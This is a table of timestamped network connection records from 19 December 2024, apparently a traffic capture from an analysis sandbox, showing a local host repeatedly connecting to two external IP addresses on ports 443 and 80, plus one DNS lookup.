| Dec 19, 2024 15:30:20.747720003 CET | 443 | 49859 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:20.756915092 CET | 49859 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:20.756942034 CET | 443 | 49859 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:20.757025957 CET | 49859 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:20.757031918 CET | 443 | 49859 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:21.477467060 CET | 443 | 49859 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:21.477546930 CET | 443 | 49859 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:21.477884054 CET | 49859 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:21.478233099 CET | 49859 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:21.481369972 CET | 49833 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:30:21.482552052 CET | 49864 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:30:21.602557898 CET | 80 | 49833 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:30:21.602797985 CET | 49833 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:30:21.603389978 CET | 80 | 49864 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:30:21.603477955 CET | 49864 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:30:21.603665113 CET | 49864 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:30:21.724695921 CET | 80 | 49864 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:30:23.809283972 CET | 80 | 49864 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:30:23.810745955 CET | 49871 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:23.810843945 CET | 443 | 49871 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:23.810933113 CET | 49871 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:23.811290979 CET | 49871 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:23.811336040 CET | 443 | 49871 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:23.850812912 CET | 49864 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:30:25.288039923 CET | 443 | 49871 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:25.290431976 CET | 49871 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:25.290472984 CET | 443 | 49871 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:25.290555000 CET | 49871 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:25.290563107 CET | 443 | 49871 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:25.990530968 CET | 443 | 49871 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:25.990659952 CET | 443 | 49871 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:25.990716934 CET | 49871 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:25.991950035 CET | 49871 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:26.069467068 CET | 49864 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:30:26.085270882 CET | 49877 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:30:26.189518929 CET | 80 | 49864 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:30:26.189610958 CET | 49864 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:30:26.204895020 CET | 80 | 49877 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:30:26.204981089 CET | 49877 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:30:26.205121994 CET | 49877 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:30:26.324682951 CET | 80 | 49877 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:30:28.553240061 CET | 80 | 49877 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:30:28.554733992 CET | 49883 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:28.554773092 CET | 443 | 49883 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:28.554846048 CET | 49883 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:28.555171967 CET | 49883 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:28.555183887 CET | 443 | 49883 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:28.600929022 CET | 49877 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:30:29.940500975 CET | 443 | 49883 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:29.943120956 CET | 49883 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:29.943140030 CET | 443 | 49883 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:29.943218946 CET | 49883 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:29.943226099 CET | 443 | 49883 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:30.719856977 CET | 443 | 49883 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:30.720060110 CET | 443 | 49883 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:30.720228910 CET | 49883 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:30.720916033 CET | 49883 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:30.723964930 CET | 49877 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:30:30.725259066 CET | 49889 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:30:30.844985962 CET | 80 | 49877 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:30:30.845069885 CET | 49877 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:30:30.845813036 CET | 80 | 49889 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:30:30.845905066 CET | 49889 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:30:30.846122026 CET | 49889 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:30:30.965703964 CET | 80 | 49889 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:30:32.161087990 CET | 80 | 49889 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:30:32.164324045 CET | 49893 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:32.164388895 CET | 443 | 49893 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:32.164454937 CET | 49893 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:32.165154934 CET | 49893 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:32.165172100 CET | 443 | 49893 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:32.210257053 CET | 49889 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:30:33.572365046 CET | 443 | 49893 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:33.574161053 CET | 49893 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:33.574187040 CET | 443 | 49893 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:33.574289083 CET | 49893 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:33.574295044 CET | 443 | 49893 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:34.215250969 CET | 443 | 49893 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:34.215353966 CET | 443 | 49893 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:34.215418100 CET | 49893 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:34.215739965 CET | 49893 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:34.247724056 CET | 49889 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:30:34.251152039 CET | 49899 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:30:34.367753983 CET | 80 | 49889 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:30:34.367851973 CET | 49889 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:30:34.370874882 CET | 80 | 49899 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:30:34.371054888 CET | 49899 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:30:34.371108055 CET | 49899 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:30:34.490592957 CET | 80 | 49899 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:30:35.676954031 CET | 80 | 49899 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:30:35.678487062 CET | 49904 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:35.678513050 CET | 443 | 49904 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:35.678584099 CET | 49904 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:35.678819895 CET | 49904 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:35.678834915 CET | 443 | 49904 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:35.725903034 CET | 49899 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:30:37.042073011 CET | 443 | 49904 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:37.043701887 CET | 49904 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:37.043714046 CET | 443 | 49904 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:37.043813944 CET | 49904 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:37.043818951 CET | 443 | 49904 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:37.686759949 CET | 443 | 49904 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:37.686839104 CET | 443 | 49904 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:37.686894894 CET | 49904 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:37.687309027 CET | 49904 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:37.690104961 CET | 49899 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:30:37.691200972 CET | 49908 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:30:37.810028076 CET | 80 | 49899 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:30:37.810127020 CET | 49899 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:30:37.810930014 CET | 80 | 49908 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:30:37.811012030 CET | 49908 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:30:37.811099052 CET | 49908 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:30:37.932337046 CET | 80 | 49908 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:30:40.115158081 CET | 80 | 49908 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:30:40.163434982 CET | 49908 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:30:40.337979078 CET | 49917 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:40.338046074 CET | 443 | 49917 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:40.338135004 CET | 49917 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:40.338432074 CET | 49917 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:40.338460922 CET | 443 | 49917 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:41.711440086 CET | 443 | 49917 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:41.713712931 CET | 49917 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:41.713746071 CET | 443 | 49917 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:41.713807106 CET | 49917 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:41.713815928 CET | 443 | 49917 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:42.399276018 CET | 443 | 49917 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:42.399373055 CET | 443 | 49917 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:42.399435997 CET | 49917 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:42.399776936 CET | 49917 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:42.402996063 CET | 49908 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:30:42.403621912 CET | 49923 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:30:42.522934914 CET | 80 | 49908 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:30:42.523000002 CET | 49908 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:30:42.523129940 CET | 80 | 49923 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:30:42.523219109 CET | 49923 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:30:42.523655891 CET | 49923 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:30:42.643117905 CET | 80 | 49923 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:30:43.826448917 CET | 80 | 49923 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:30:43.828835964 CET | 49925 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:43.828861952 CET | 443 | 49925 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:43.828952074 CET | 49925 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:43.829175949 CET | 49925 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:43.829189062 CET | 443 | 49925 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:43.882224083 CET | 49923 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:30:45.196583033 CET | 443 | 49925 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:45.198499918 CET | 49925 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:45.198514938 CET | 443 | 49925 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:45.198600054 CET | 49925 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:45.198610067 CET | 443 | 49925 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:45.840930939 CET | 443 | 49925 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:45.841039896 CET | 443 | 49925 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:45.841094017 CET | 49925 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:45.841927052 CET | 49925 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:45.855632067 CET | 49923 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:30:45.857657909 CET | 49931 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:30:45.975850105 CET | 80 | 49923 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:30:45.975955009 CET | 49923 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:30:45.977206945 CET | 80 | 49931 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:30:45.977289915 CET | 49931 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:30:45.977520943 CET | 49931 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:30:46.097132921 CET | 80 | 49931 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:30:48.282063961 CET | 80 | 49931 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:30:48.283658981 CET | 49937 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:48.283729076 CET | 443 | 49937 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:48.283823967 CET | 49937 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:48.284146070 CET | 49937 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:48.284173965 CET | 443 | 49937 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:48.335469007 CET | 49931 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:30:48.794163942 CET | 80 | 49761 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:30:48.794279099 CET | 49761 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:30:49.652604103 CET | 443 | 49937 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:49.654329062 CET | 49937 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:49.654409885 CET | 443 | 49937 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:49.654505014 CET | 49937 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:49.654520035 CET | 443 | 49937 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:50.316178083 CET | 443 | 49937 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:50.316272020 CET | 443 | 49937 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:50.316344023 CET | 49937 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:50.316999912 CET | 49937 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:50.321760893 CET | 49931 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:30:50.323159933 CET | 49942 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:30:50.443751097 CET | 80 | 49931 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:30:50.443824053 CET | 49931 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:30:50.445051908 CET | 80 | 49942 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:30:50.445144892 CET | 49942 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:30:50.445310116 CET | 49942 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:30:50.569422960 CET | 80 | 49942 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:30:51.756139040 CET | 80 | 49942 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:30:51.758093119 CET | 49947 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:51.758119106 CET | 443 | 49947 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:51.758219957 CET | 49947 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:51.758519888 CET | 49947 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:51.758531094 CET | 443 | 49947 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:51.804204941 CET | 49942 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:30:53.128321886 CET | 443 | 49947 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:53.130317926 CET | 49947 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:53.130340099 CET | 443 | 49947 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:53.130436897 CET | 49947 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:53.130443096 CET | 443 | 49947 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:53.779226065 CET | 443 | 49947 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:53.779316902 CET | 443 | 49947 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:53.779627085 CET | 49947 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:53.779908895 CET | 49947 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:53.783374071 CET | 49942 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:30:53.784164906 CET | 49952 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:30:53.903666973 CET | 80 | 49942 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:30:53.903712988 CET | 80 | 49952 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:30:53.903769970 CET | 49942 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:30:53.903803110 CET | 49952 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:30:53.903964043 CET | 49952 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:30:54.023660898 CET | 80 | 49952 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:30:55.210642099 CET | 80 | 49952 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:30:55.236578941 CET | 49955 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:55.236685991 CET | 443 | 49955 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:55.236766100 CET | 49955 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:55.237215996 CET | 49955 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:55.237251043 CET | 443 | 49955 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:55.257339954 CET | 49952 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:30:56.601099014 CET | 443 | 49955 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:56.603755951 CET | 49955 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:56.603801012 CET | 443 | 49955 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:56.603945971 CET | 49955 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:56.603952885 CET | 443 | 49955 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:57.250334978 CET | 443 | 49955 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:57.251780033 CET | 443 | 49955 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:57.251878023 CET | 49955 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:57.252789021 CET | 49955 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:57.259572029 CET | 49952 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:30:57.261198997 CET | 49961 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:30:57.379476070 CET | 80 | 49952 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:30:57.379539013 CET | 49952 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:30:57.380826950 CET | 80 | 49961 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:30:57.380903006 CET | 49961 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:30:57.381041050 CET | 49961 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:30:57.500644922 CET | 80 | 49961 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:30:59.684894085 CET | 80 | 49961 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:30:59.686619043 CET | 49967 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:59.686674118 CET | 443 | 49967 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:59.686822891 CET | 49967 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:59.687220097 CET | 49967 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:30:59.687232018 CET | 443 | 49967 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:30:59.726094007 CET | 49961 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:31:01.052758932 CET | 443 | 49967 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:31:01.080029964 CET | 49967 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:31:01.080056906 CET | 443 | 49967 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:31:01.080122948 CET | 49967 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:31:01.080127954 CET | 443 | 49967 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:31:01.789340973 CET | 443 | 49967 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:31:01.789412975 CET | 443 | 49967 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:31:01.789464951 CET | 49967 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:31:01.792789936 CET | 49967 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:31:01.804651976 CET | 49961 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:31:01.806581974 CET | 49973 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:31:01.924550056 CET | 80 | 49961 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:31:01.924611092 CET | 49961 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:31:01.927634001 CET | 80 | 49973 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:31:01.927705050 CET | 49973 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:31:01.950740099 CET | 49973 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:31:02.070529938 CET | 80 | 49973 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:31:03.239947081 CET | 80 | 49973 | 132.226.247.73 | 192.168.2.5 |
| Dec 19, 2024 15:31:03.241168976 CET | 49979 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:31:03.241202116 CET | 443 | 49979 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:31:03.241265059 CET | 49979 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:31:03.241527081 CET | 49979 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:31:03.241538048 CET | 443 | 49979 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:31:03.288630962 CET | 49973 | 80 | 192.168.2.5 | 132.226.247.73 |
| Dec 19, 2024 15:31:04.775685072 CET | 443 | 49979 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:31:04.819873095 CET | 49979 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:31:06.405047894 CET | 49979 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:31:06.405069113 CET | 443 | 49979 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:31:06.405153036 CET | 49979 | 443 | 192.168.2.5 | 149.154.167.220 |
| Dec 19, 2024 15:31:06.405160904 CET | 443 | 49979 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:31:07.086625099 CET | 443 | 49979 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:31:07.086819887 CET | 443 | 49979 | 149.154.167.220 | 192.168.2.5 |
| Dec 19, 2024 15:31:07.087083101 CET | 49979 | 443 | 192.168.2.5 | 149.154.167.220 |
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Dec 19, 2024 15:29:20.939297915 CET | 51524 | 53 | 192.168.2.5 | 1.1.1.1 |
| Dec 19, 2024 15:29:21.076962948 CET | 53 | 51524 | 1.1.1.1 | 192.168.2.5 |
